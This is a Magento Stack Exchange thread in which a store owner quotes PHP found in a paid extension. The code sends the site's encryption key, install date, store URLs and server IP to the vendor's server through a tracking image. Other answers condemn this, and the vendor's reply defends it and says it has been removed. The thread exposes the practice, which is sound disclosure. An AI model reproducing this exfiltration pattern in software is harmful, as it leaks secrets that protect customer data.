19

Forgive my ignorance, but crypt key is used for decrypting Magento data, right? Is there any good reason for a module to access this? I stumbled across this code after installing Advanced Content Manager...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />

tylersDisplayName
  • 1,590
  • 1
  • 18
  • 46

2 Answers2

11

Yes...there is a good reason.
They want to know it and log it, just in case. :)

You should uninstall the extension (most probably you already did). You should never use extensions that "phone home", no matter what data they sends home.

You might want to list the extension here for others to see: Funny / Useless / Horrible code from Magento Extensions

Community
  • 1
Marius
  • 197,939
  • 53
  • 422
  • 830
  • 1
    "phoning home" unfortunately is done by a lot of modules. Amasty and Aheadworks do it as well :\ – Sander Mangel Mar 05 '15 at 20:39
  • 4
    This https://gist.github.com/miguelbalparda/b57a47a010a5995bc44d can be used to check for global/crypt/key from CLI in all the folders excelt app/code/core. – mbalparda Mar 05 '15 at 21:00
  • So not only are they able to decrypt cc data (good thing I don't save it) passwords, etc.. But I paid $300 for them to have that ability. That is what should be posted to Funny. – tylersDisplayName Mar 05 '15 at 22:26
  • 1
    @iUseMagentoNow. This is funny "ooh", not funny "ha ha". You should ask for your money back. – Marius Mar 06 '15 at 07:49
8

We got the support request about this feature today. We already resolved it and remove this piece of code. A new release is available for all our customers in their customers area (for free, as we offer unlimited update).

I know we need to justify this, so let's do that:

  • The goal of this tracker was ONLY to follow the non authorized use of our extension.
  • The tracker was only displayed in the admin area (none of your customers or any one else than you and us has been able to see it).
  • We removed this in our DB too.
  • The key is only to encrypt your admin password. As we use to work with all of you by support requests, you may have already sent your credentials to us by email anyway, for support. If we wanted your password, we would directly sent it... It was not the goal.
  • Even with the key, your password is still encrypted. And magento admin blocks user after some attemps.

We recognize that it is a mistake, and this is the strength of the community and open source system: we can fix and improve much faster. Thank you all for having alerting us, we will make more effort on vulnerability now.

Marius
  • 197,939
  • 53
  • 422
  • 830
Advanced Content manager
  • 81
  • 2